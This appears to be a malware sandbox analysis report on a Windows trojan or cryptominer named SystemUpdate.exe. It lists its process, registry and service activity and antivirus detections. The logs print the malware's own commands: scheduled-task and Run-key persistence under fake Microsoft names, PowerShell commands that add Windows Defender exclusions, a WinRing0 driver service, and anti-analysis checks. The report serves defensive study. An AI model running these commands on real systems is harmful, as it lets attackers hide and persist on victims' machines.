CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2476 thread_handle: 0x00000280 process_identifier: 2500 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000027c	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2672 thread_handle: 0x0000027c process_identifier: 2664 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000280	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2900 thread_handle: 0x00000280 process_identifier: 2896 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000027c	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 3040 thread_handle: 0x0000027c process_identifier: 3064 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000280	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2788 thread_handle: 0x00000280 process_identifier: 2836 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000027c	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 1528 thread_handle: 0x0000027c process_identifier: 1512 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000280	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2304 thread_handle: 0x00000280 process_identifier: 2292 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000027c	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2488 thread_handle: 0x0000027c process_identifier: 2536 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000280	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2856 thread_handle: 0x00000280 process_identifier: 2824 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000027c	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 3060 thread_handle: 0x0000027c process_identifier: 3028 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000280	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 1560 thread_handle: 0x00000280 process_identifier: 452 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk2511" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000027c	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 416 thread_handle: 0x000002c8 process_identifier: 2788 current_directory: C:\ProgramData\SystemFiles\ filepath: track: 1 command_line: "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000026c	1	1
CreateProcessInternalW April 4, 2023, 5:15 p.m.	thread_identifier: 1376 thread_handle: 0x0000038c process_identifier: 936 current_directory: C:\ProgramData\SystemFiles\ filepath: track: 1 command_line: "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a0	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 4, 2023, 5:14 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 4, 2023, 5:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 4, 2023, 5:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 4, 2023, 5:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 4, 2023, 5:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 4, 2023, 5:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Terminates another process (7 events)

Time & API	Arguments	Status	Return
NtTerminateProcess April 4, 2023, 5:15 p.m.	status_code: 0xffffffff process_identifier: 2540 process_handle: 0x00000170		0
NtTerminateProcess April 4, 2023, 5:14 p.m.	status_code: 0xffffffff process_identifier: 452 process_handle: 0x00000278		0
NtTerminateProcess April 4, 2023, 5:14 p.m.	status_code: 0xffffffff process_identifier: 452 process_handle: 0x00000278	1	0
NtTerminateProcess April 4, 2023, 5:14 p.m.	status_code: 0xffffffff process_identifier: 3028 process_handle: 0x00000278		0
NtTerminateProcess April 4, 2023, 5:14 p.m.	status_code: 0xffffffff process_identifier: 3028 process_handle: 0x00000278		3221225738
NtTerminateProcess April 4, 2023, 5:14 p.m.	status_code: 0xffffffff process_identifier: 0 process_handle: 0x00000278		0
NtTerminateProcess April 4, 2023, 5:14 p.m.	status_code: 0xffffffff process_identifier: 0 process_handle: 0x00000278	1	0

Uses Windows utilities for basic Windows functionality (26 events)

cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	chcp 1251
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk2511" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 70196d6ec9d4188a80ab4fd2647cd032a23c7339
buffer	Buffer with sha1: c601b2777a3a58774562f767d582e7465cdbf4d4

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 4, 2023, 5:14 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	SystemUpdate.exe tried to sleep 2728339 seconds, actually delayed analysis time by 2728339 seconds
description	dllhost.exe tried to sleep 5456550 seconds, actually delayed analysis time by 5456550 seconds

Installs itself for autorun at Windows startup (32 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dllhost	reg_value	C:\ProgramData\Dllhost\dllhost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray	reg_value	C:\Windows\System32\SecurityHealthSystray.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender	reg_value	C:\Program Files\Windows Defender\MpCmdRun.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Cortana	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe\Cortana.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE	reg_value	C:\Windows\System32\wbem\WmiPrvSE.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable	reg_value	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\NvStray	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk2511" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW April 4, 2023, 5:08 p.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\ProgramData\Dllhost\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\ProgramData\Dllhost\WinRing0x64.sys desired_access: 983551 service_handle: 0x000000000043c5a0 error_control: 1 service_type: 1 service_manager_handle: 0x000000000043c540	1	4441504	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 4, 2023, 5:08 p.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetectNet.01
Lionic	Trojan.Win32.Evader.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Lazy.321759
FireEye	Generic.mg.09a29f3b529c5e9a
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
McAfee	Artemis!09A29F3B529C
Cylance	unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 0058f7721 )
Alibaba	Trojan:MSIL/CrimsonRAT.347c276d
K7GW	Trojan ( 0058f7721 )
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Lazy.D4E8DF
BitDefenderTheta	Gen:NN.ZemsilF.36132.dm0@aCDig9h
Cyren	W32/MSIL_Kryptik.HRL.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Agent.VFA
Cynet	Malicious (score: 99)
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.MSIL.Evader.gen
BitDefender	Gen:Variant.Lazy.321759
Avast	Win32:TrojanX-gen [Trj]
Tencent	Msil.Trojan.Evader.Bdhl
Emsisoft	Gen:Variant.Lazy.321759 (B)
F-Secure	Heuristic.HEUR/AGEN.1310939
DrWeb	Trojan.MinerNET.25
VIPRE	Gen:Variant.Lazy.321759
TrendMicro	TROJ_GEN.R002C0DCV23
McAfee-GW-Edition	Artemis!Trojan
Sophos	Mal/ILAgent-B
SentinelOne	Static AI - Malicious PE
Avira	HEUR/AGEN.1310939
Antiy-AVL	Trojan/MSIL.Evader
Gridinsoft	Trojan.Win32.Agent.cl
Microsoft	Trojan:MSIL/CrimsonRAT.MBAT!MTB
ZoneAlarm	HEUR:Trojan.MSIL.Evader.gen
GData	Gen:Variant.Lazy.321759
Google	Detected
AhnLab-V3	Trojan/Win.Generic.C5364961
ALYac	Gen:Variant.Lazy.321759
MAX	malware (ai score=85)
Malwarebytes	Trojan.Crypt.MSIL
Panda	Trj/GdSda.A
TrendMicro-HouseCall	TROJ_GEN.R002C0DCV23
Rising	Trojan.Agent!8.B1E (CLOUD)
Ikarus	Trojan.MSIL.Agent
MaxSecure	Trojan.Malware.121218.susgen
Fortinet	MSIL/Agent.VFA!tr

SystemUpdate.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All